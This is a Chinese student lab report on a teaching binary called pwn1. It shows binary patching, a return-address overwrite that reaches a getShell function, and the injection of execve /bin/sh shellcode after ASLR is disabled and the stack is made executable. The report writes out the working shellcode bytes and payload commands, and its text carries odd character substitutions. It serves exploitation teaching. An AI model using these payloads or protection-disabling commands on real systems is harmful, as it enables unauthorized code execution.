pwn1
的linux可执行文件。main
调用foo
函数,foo
函数会简单回显任何用户输入的字符串。getShell
,会返回一个可用Shell
。正常状况下这个代码是不会被运行的。咱们实践的目标就是想办法运行这个代码片断。咱们将学习两种方法运行这个代码片断,而后学习如何注入运行任何Shellcode
。返回目录html
getShell
foo
函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell
函数shellcode
并运行这段shellcode
返回目录linux
掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码shell
- 使用
objdump -d 20165330zyx
可查看可执行文件20165330zyx
的反汇编代码及其对应机器码
- 可知:
NOP
:无做用,英文"no operation"的简写,意思是"do nothing"(机器码90)JNE
:若不相等则跳(机器码75JE
:若相等则跳(机器码74JMP
:无条件转移指令。段内直接短转Jmp short(机器码:EB),段内直接近转移Jmp near(机器码:E9),段内间接转移Jmp word(机器码:FF),段间直接(远)转移Jmp far(机器码:EA)CMP
:比较指令,cmp的功能至关于减法指令。它不保存结果,只是影响相应的标志位(机器码39)
掌握反汇编与十六进制编程器编程
- 反汇编指令:
objdump -d objfile
,关于其余用法可参考Linux下C程序的反汇编- 关于管道,输入、输出重定向参考linux下输入输出重定向和管道符
- 十六进制编程器:用来以16进制视图进行文本编辑的编辑工具软件,其实咱们只须要用各系统都兼容的
vim编辑器
就能够实现十六进制编辑的功能。具体步骤以下:
- 输入命令
vi 20165330zyx
查看可执行文件内容,发现大部分是咱们无法理解的乱码;- 按
esc
后在底行输入:%!xxd
将显示模式切换为16进制模式;- 进行相关操做后,输入
:%!xxd -r
转换16进制为原格式。
能正确修改机器指令改变程序执行流程vim
见实验步骤1sass
能正确构造payload进行bof攻击安全
见实验步骤3bash
返回目录网络
getShell
函数objdump -d 20165330zyx
指令查看可执行文件的反汇编结果80484b5: e8 d7 ff ff ff call 8048491 <foo>
getShell
函数的地址0804847d
和foo
函数的地址08048491
,能够发现两地址之差为十六进制14;d7 ff ff ff
这四个字节为数值部分,表明指令跳转时须要与eip
寄存器相加的偏移量getShell
,只须要修改d7 ff ff ff
便可。因为数值存储方式为小端方式,因此锁定须要改的字节为d7
,将它与地址差14作减法运算后的值为c3call
指令的目标地址由d7ffffff
变为c3ffffff
cp 20165330zyx 20165330pwn2
复制文件vi 20165330pwn2
编辑可执行文件;esc
后,输入%!xxd
将显示模式切换为十六进制模式/d7
查找须要修改的内容,将d7改成c3:%!xxd -r
:wq
call
指令调用的函数被改./20165330pwn2
运行该可执行文件foo
函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell
函数foo
函数,咱们发现这个函数有Buffer overflow漏洞foo
函数读入字符串,但系统只预留了32字节的缓冲区,超出部分会形成溢出,咱们的目标是覆盖返回地址call
调用foo
,同时在堆栈上压上返回地址值0x80484ba
gdb 20165330pwn
(pwn的副本)调试程序,输入有规律的字符串如1111111122222222333333334444444412345678
,发生段错误产生溢出info r
查看寄存器eip的值,发现输入的1234被覆盖到堆栈上的返回地址getShell
的地址0x0804847d
把1234替换便可11111111222222223333333344444444\x7d\x84\x04\x08
\x7d\x84\x04\x08
这样的16进制值,输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
生成包括字符串的一个文件(\x0a
表示回车)xxd
查看input文件的内容是否如预期(cat input;cat) | ./20165330pwn
将input中的字符串做为可执行文件的输入shellcode
并运行这段shellcode
apt-get install execstack
修改些设置dom
execstack -s pwn1 //设置堆栈可执行 execstack -q pwn1 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space
咱们选择retaddr+nops+shellcode结构来攻击buf,在shellcode前填充nop的机器码90:
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode //上面的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。咱们得把它改成这段shellcode的地址。 //特别提醒:最后一个字符千万不能是\x0a
(cat input_shellcode;cat) | ./20165330pwn
ps -ef | grep 20165330pwn
attach 2222
与进程创建链接设置断点查看注入buf的内存地址
disassemble foo //反汇编 break *0x080484ae //设置断点 //在另一个终端中按下回车
c
继续info r esp
查看esp栈顶指针的地址x/16x 0xffffd33c
查看其存放内容,看到01020304
,就是返回地址的位置。根据咱们构造的input_shellcode
可知,shellcode就在其后,因此地址是 0xffffd340
,即0xffffd33c加上4字节
c
-quit
退出gdb调试,回到以前的终端输入exit
退出命令,修改以前的\x4\x3\x2\x1
部分:perl -e 'print "A" x 32;print"\x40\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
再次运行(cat input_shellcode;cat) | ./20165330pwn
后发现执行成功
在实验过程当中虚拟机链接网络失败,试了以前全部方法都没效果
解决办法:参考如何解决VMware Workstation虚拟机没法上网,重置网络设置以后重启虚拟机便可链接网络。
在运行pwn1时出现错误提示:[ bash: ./pwn1:没有那个文件或目录]
,但ls命令下又能看到存在pwn1文件
解决办法:参考64位Kali没法顺利执行pwn1问题的解决方案,通常可解决。
在对上一个问题进行解决时,按照方法却出现了错误提示kali没法安全地用该源进行更新,因此默认禁用该源
,kali没法更新源
解决办法:参考解决kali更新源时出现签名无效问题,我将更新源换成该博客中的内容后在进行
apt-get update
更新成功,以后输入apt-get install lib32z1
32位运行库安装成功,文件可执行
下载execstack程序时,出现错误提示
实验收获与感想
在此次实验中不只懂得了什么是缓冲区溢出,也动手实现了缓冲区溢出,而且也把上学期所学的一些内容又串联在了一块儿,加深了我对堆栈的理解。
什么是漏洞?漏洞有什么危害?
- 缓冲区溢出就是输入的内容超过所分配的缓冲区空间,被溢出的内容因为设计的缺陷没有被马上检查到,而破坏堆栈覆盖一些原始数据。
- 会致使程序运行失败、系统关机、从新启动,或者执行攻击者的指令,好比非法提高权限。